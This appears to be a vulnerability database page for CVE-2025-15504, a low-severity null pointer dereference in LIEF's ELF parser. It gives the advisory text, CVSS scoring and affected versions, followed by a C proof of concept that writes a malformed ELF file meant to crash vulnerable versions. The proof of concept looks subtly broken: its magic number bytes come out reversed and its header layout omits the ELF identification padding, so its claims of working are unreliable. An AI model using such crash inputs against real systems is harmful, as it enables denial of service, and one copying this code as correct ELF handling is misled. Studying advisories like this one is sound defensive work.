Security Vulnerability Report
CVE-2025-15504 CVSS 3.3 LOW

CVE-2025-15504

Published: 2026-01-10 12:15:50
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:* - VULNERABLE
lief-project/LIEF <= 0.17.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2025-15504: Null Pointer Dereference in LIEF ELF Parser
// This PoC creates a malformed ELF file that triggers the vulnerability
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// ELF magic number
#define ELF_MAGIC 0x7F454C46

// ELF header structure (simplified)
typedef struct {
    uint32_t e_ident_magic;
    uint8_t  e_ident_class;
    uint8_t  e_ident_data;
    uint8_t  e_ident_version;
    uint8_t  e_ident_osabi;
    uint8_t  e_ident_abiversion;
    uint16_t e_type;
    uint16_t e_machine;
    uint32_t e_version;
    uint64_t e_entry;
    uint64_t e_phoff;
    uint64_t e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize;
    uint16_t e_phentsize;
    uint16_t e_phnum;
    uint16_t e_shentsize;
    uint16_t e_shnum;
    uint16_t e_shstrndx;
} Elf64_Ehdr;

void create_malformed_elf(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("Failed to create file\n");
        return;
    }

    Elf64_Ehdr ehdr = {0};

    // Set ELF magic number
    ehdr.e_ident_magic = ELF_MAGIC;
    ehdr.e_ident_class = 2;    // 64-bit
    ehdr.e_ident_data = 1;     // Little endian
    ehdr.e_ident_version = 1;
    ehdr.e_ident_osabi = 0;

    // Set specific values to trigger the vulnerability
    ehdr.e_type = 2;           // ET_EXEC
    ehdr.e_machine = 62;       // EM_X86_64
    ehdr.e_version = 1;

    // Set section header table values that may cause null pointer dereference
    ehdr.e_shoff = 0x1000;     // Section header table offset
    ehdr.e_shnum = 0xFFFF;     // Large number of sections
    ehdr.e_shentsize = 64;
    ehdr.e_shstrndx = 0xFFFE;  // Invalid string table index

    // Write malformed ELF header
    fwrite(&ehdr, sizeof(Elf64_Ehdr), 1, fp);
    fclose(fp);

    printf("Malformed ELF file created: %s\n", filename);
}

int main() {
    const char* poc_file = "poc_cve_2025_15504.elf";
    create_malformed_elf(poc_file);

    printf("\nUsage: Parse this file with vulnerable LIEF version\n");
    printf("The malformed ELF header will trigger null pointer dereference\n");
    return 0;
}
